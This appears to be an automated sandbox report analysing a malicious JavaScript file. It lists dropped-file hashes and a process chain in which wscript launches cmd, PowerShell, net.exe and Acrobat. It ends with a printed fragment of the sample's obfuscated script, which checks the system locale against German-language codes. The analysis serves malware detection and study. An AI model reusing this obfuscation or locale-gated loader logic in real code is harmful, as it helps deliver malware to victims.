MD5: | C94B80E9957A55478B1D9CB68CDAF318 |
SHA1: | 5DEA3345E0509236D5D4E4C53F0E307794F950AE |
SHA-256: | 8E905D240F99904559CFD711F04EBA3626477B99F110544DC6939FA65CE235DE |
SHA-512: | 5FEF32560924FEF558312F1195088191A28AE63615E4C05ABDC9A0F7184AD38D6AE751EBFD3538DD8B744DD66A7CE2ABE8F9D110EC135CAA41E763A9C0E3E1BE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.223630162958194 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJfshHHrPeUkwRe9:YvXKXBVKxYpW7RH5GUUUkee9 |
MD5: | D2316E70B48847AD99CB332DCC9D10E9 |
SHA1: | A5808183AA91AB7639D78CB2BFB9DD71B01BC84F |
SHA-256: | D5B45CDDC4ECE83DF20CC9CCE5DEAB8F6AE0B91E589AEFA32B6B1296380FB757 |
SHA-512: | 6DC00139D4929C7C0E72035C305A9A2B2B5E243857E0ED78FFA1430103B9F107AAB8BDABCAD0FB807959F3D632E2AE869630D96FF1BB6E8E4BF22395B38591D1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.2433231595745475 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB3a0KYb+FIbRI6XVW7+0YaHKoAvJTqgFCrPeUkwRe9:YvXKXBVKxYpW7RH5GTq16Ukee9 |
MD5: | A4F192073F56536B0C2E0E888B6E9408 |
SHA1: | 6E38411AB06A39EE1C5B2F78EC522303BC788751 |
SHA-256: | 6FC35F5034321EB983C127DC0EFAEF3C2BD45B7985C08AFC7DA1DB11CD7B7A53 |
SHA-512: | 5AA51739A48AB0EDF18D6E96E43FA9A77D913982772D276B142911469419C0229EF2EBC5B2B3A59DF152B735C8CC218BF63AFDF89195CB6B6F45E464DE1830C5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.141200273110349 |
Encrypted: | false |
SSDEEP: | 24:YF0YJTIagHayUQT0nacv1I1Bi1WH9ty4jpIj0SkuZc2Ga12LSWC7d+JmXe3/5OlK:YJ1pawI1KG9tcZW+1Ei3Xev2798 |
MD5: | FFA6B2F5389247E755EA3DAC4E4C9668 |
SHA1: | A729F04417713704B72069DE09FCAB7E0B866BED |
SHA-256: | 0E1A74F0926C15DAED010649EEF0F5C14DA65B6A88F54192C207C7A30BCB4234 |
SHA-512: | 28B320F64345CBEEAF3FF33198F8A12AFCEBC6B03ED6298079222FF3E8524F6DFE5994879F78154966A74F7D633E6123C587A3249DD3F0182974F0EF0CE61AD3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.0034942510716884 |
Encrypted: | false |
SSDEEP: | 24:TLKufx/XYKQvGJF7ursB1RZKHs/Dx4+a1Vp01auVV4eJjJCp0VF:TGufl2GL7msvgOx4+a1Dgau34et8p0/ |
MD5: | 7002376E7357559675FD33DC0D7CFB09 |
SHA1: | 957B2A686BE30DFB087B52D30AA39D64EBE480E0 |
SHA-256: | 8EDB8F2790D3D2D2008D2B49236579931DC8421A9D344D025CDD2C72EAD9D1F1 |
SHA-512: | 67B7146908B2175394D788A9FE649876BD645594FE0587C37DB78E5F85DCF8CBEC3368700BFCBF0330FCA8C74501079D38DCB23E7E63EFB3F93A2D0FFA9F6914 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.3679163524600706 |
Encrypted: | false |
SSDEEP: | 24:7+t11RZKHs/Ds/SpJVp01auVV4eJjJCp0V1qLhx/XYKQvGJF7ursG:7MLgOVpJDgau34et8p0rqFl2GL7msG |
MD5: | F52993A85400583472A51EF96413918E |
SHA1: | EC403497267A04E33DBA8E1BC97BC06EECD312DC |
SHA-256: | E09091E5C966A9247BB4F16CF52DAF2686079A465F2A4980F494493784C27B81 |
SHA-512: | 82987FD873108A3EFCEBD3525A970195E820744C073D8E39605A02E24C54ADC27152E8C34847BCB74CEEA8670020CE25CA1BB8A14600BB7621FD0F0A281DD571 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgMHU7jMj6PeXpCrUgMhUvm/nscgYyu:6a6TZ44ADEMHqQj6PEpaWnsvK |
MD5: | 16CA9204D955B4E4789A0D0B0DA00BCE |
SHA1: | 74DA277F39F3E74372EE3452B0AEFEEE83D872DA |
SHA-256: | 320932123B757BE67B2849436249F4DF80EB9DBEB29726CD36F7C8B8F967AF37 |
SHA-512: | AE39D8EDAE1451081353E19B6C3BD821B82AF5003FC6E8D7C09E6DB5894523CA7E47525B5CB351E1253F8B57545F68031F9B5F05BB67418166D58FEE5B5AF5C1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulnmWllZ:NllUmWl |
MD5: | 3EBBEC2F920D055DAC842B4FF84448FA |
SHA1: | 52D2AD86C481FAED6187FC7E6655C5BD646CA663 |
SHA-256: | 32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09 |
SHA-512: | 163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.488809521505088 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Cl+VH:Qw946cPbiOxDlbYnuRKdhVH |
MD5: | 86E11BE976306E29F71F1E0191EB2F31 |
SHA1: | 045D2485B21E9333E4BF06A5F0DB920ADE6C8419 |
SHA-256: | 351C53550FF4FB5D5BFBFCD14D83B9A83501135B582335BBEB1E255DD4912BE9 |
SHA-512: | 96BB3E744A02E0F1C89DFCFD63FCA8C4602C864B5B0E88E31086E396739E5ECF755FFCA5ACD7A8CB759C6002B8E07E6349C7DE62C767D2333C5AE6181670748D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 03-20-16-860.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.376360055978702 |
Encrypted: | false |
SSDEEP: | 384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn |
MD5: | 1336667A75083BF81E2632FABAA88B67 |
SHA1: | 46E40800B27D95DAED0DBB830E0D0BA85C031D40 |
SHA-256: | F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1 |
SHA-512: | D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.362818995256196 |
Encrypted: | false |
SSDEEP: | 384:EWAvoK1/OiHBqsHZilUDdXdhdVG+lqlHlolrl1ZMpy8egMO8u7JzZqlIabgQaXar:Yqo |
MD5: | D345F9AA09E16E7669FDCCAF8F4C9139 |
SHA1: | 81AE0267E1D1AC075058A5A979446708F146C609 |
SHA-256: | 1082B102AB142CC151CDD25A4C58C3DB624DF94F91FE52CAEA0BB96E4234C0A1 |
SHA-512: | D5E80343CD3C1934B4BC0F38746A983865C251330ED2C20393C3224132E01E549F81FE7A76462B523623C9A0EEE9208C475DBDFB15A7A49F2E16826BE795B80C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.397175749866466 |
Encrypted: | false |
SSDEEP: | 768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbd:Z |
MD5: | B85741B6067BEC4A3DCE782F3FA69A04 |
SHA1: | 298D6D2F40B079FBBA44E4AEFE300C8CD84A880C |
SHA-256: | 1DC322234090239CB6A42CD74D4C592F82407594ECFB79FF6C2A2898ED1D8A29 |
SHA-512: | 95DF6BD197A0F48A5CFAC2D9B50D4D5A6C49A4994E8873E191A0E5F0043AC4FB2AA2A6B7C5F65F61BF74DA7BFE93EBDD2AED6B25427B7A6254646A1C0251349F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/2wYIGNP4mOWL07oYGZZdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:OwZG6bWLxYGZh3mlind9i4ufFXpAXkru |
MD5: | B35FED7BE92D90BA6DDDCEF30C86FA29 |
SHA1: | 76BA97E63AA2532639743F995CEF1923C40C1C2F |
SHA-256: | 7C9BDC820EE2C370877C39A2C22785ACFBC2E8E483D68F55EF5F8EEA2E041F8F |
SHA-512: | 23191B74EB0FF770FB92900EA279C0D138A72A083D078446A25E377953233E013FAB6F0346EF4CBDB1A2AC3D925B988D67157842D38029EDDF36905236FD51E8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14456 |
Entropy (8bit): | 4.2098179599164975 |
Encrypted: | false |
SSDEEP: | 192:gcPqYV/saFlwwR+kMqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y14e:g7Q/X4kMb0lZ6mgtdHOelGdWaolvsTZ |
MD5: | 32FCA302C8B872738373D7CCB1E75FD4 |
SHA1: | DA85FAF24ED0ECFD5D69CCFD6286D8B77D7EB4F1 |
SHA-256: | CD0DD26304B88C20801FE80B33C49C009E2E5D4411B5D7F83252E1D90CD461C6 |
SHA-512: | 57F8CC85FAFB15455074431216E47433E50DF5DE74ED74C395B7FF2C433DB7CE06F0A1C1FE1EFDC17229DBC33325D559789F43901556DD1A12963B94F01D5A1F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.921221242843298 |
TrID: | |
File name: | 871073659923481.js |
File size: | 19'978 bytes |
MD5: | 35ecd74540abcb3e47d6c67fe0b2d505 |
SHA1: | a17d20eb717936ddc27c0c6eddb1002a2c497d36 |
SHA256: | de5a8e1a6687a1d7f8ac9666eb036156d0a5121a651343048a0a4b3124b50986 |
SHA512: | 12e60d0aeef10a6cdfb60509def8972633fd310ef45170cd3e15667f1c68f61f693482a6636c863974b14c1ea23b8dfab163a75794b98728e5aabce81214b9a6 |
SSDEEP: | 192:M8tIxNyfhyzmiykqxwwrDWcc3P1zc5vZSJBobVwOfcJNIYv0j3HQb4Il0/4NsaUj:qyJyTykqRUJNzv0Ilk4NMn3yhovok33 |
TLSH: | 199233C6C602CBEB80F84D514DEF50C2378C604DDE918B84D151298E89EB5BFA5DAAFD |
File Content Preview: | function xzrmvvsi(){hwwdra=[1031,3079,5127,4103,2055,3072];var wyyzastm=this[wgdydi+ogmfusej+twdywxn+ajhgkxw+zwuqitof+uwsftvsr+irqnct+ndyctpvjx](this[dheamgd+yhpuwit+esvgqp+twdywxn+yuaewfni+wgdydi+ndyctpvjx][znyfsfw+twdywxn+zwuqitof+ogmfusej+ndyctpvjx+zwu |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 03:20:08 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff631980000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 03:20:08 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c7b40000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 03:20:08 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 03:20:08 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7be880000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 03:20:13 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff686a00000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 03:20:13 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c7b40000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 03:20:13 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6de890000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 03:20:14 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6413e0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 03:20:14 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e52b0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 03:20:14 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6413e0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function xzrmvvsi() { |
|
1 | hwwdra = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var wyyzastm = this[wgdydi + ogmfusej + twdywxn + ajhgkxw + zwuqitof + uwsftvsr + irqnct + ndyctpvjx] ( this[dheamgd + yhpuwit + esvgqp + twdywxn + yuaewfni + wgdydi + ndyctpvjx][znyfsfw + twdywxn + zwuqitof + ogmfusej + ndyctpvjx + zwuqitof + xjyxbrhc + vpjefoqjv + ajoxptl + zwuqitof + esvgqp + ndyctpvjx] ( dheamgd + yhpuwit + esvgqp + twdywxn + yuaewfni + wgdydi + ndyctpvjx + tqhzhp + yhpuwit + yyrlms + zwuqitof + annngcf + annngcf ) [obdnzrhak + zwuqitof + tsnmgkrj + obdnzrhak + zwuqitof + ogmfusej + moprnzc] ( lcsqvfai + ppempmvsm + mpmzkvy + pbnjuddww + mnntmjrng + znyfsfw + mtsgw + obdnzrhak + obdnzrhak + mpmzkvy + ldkqap + lvqlo + mnntmjrng + mtsgw + yhpuwit + mpmzkvy + obdnzrhak + wlunvo + znyfsfw + iwfqnevm + irqnct + ndyctpvjx + twdywxn + iwfqnevm + annngcf + yuren + xloxf + ogmfusej + irqnct + zwuqitof + annngcf + wlunvo + uwsftvsr + irqnct + ndyctpvjx + zwuqitof + twdywxn + irqnct + ogmfusej + ndyctpvjx + yuaewfni + iwfqnevm + irqnct + ogmfusej + annngcf + wlunvo + iijgkmcq + iwfqnevm + esvgqp + ogmfusej + annngcf + zwuqitof ), 16 ); |
|
3 | for ( tdosuqv = 0 ; tdosuqv < hwwdra[annngcf + zwuqitof + irqnct + tsnmgkrj + ndyctpvjx + yyrlms] ; ++ tdosuqv ) | |
4 | { | |
5 | if ( wyyzastm == hwwdra[tdosuqv] ) | |
6 | { | |
7 | wyyzastm = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( wyyzastm !== true ) | |
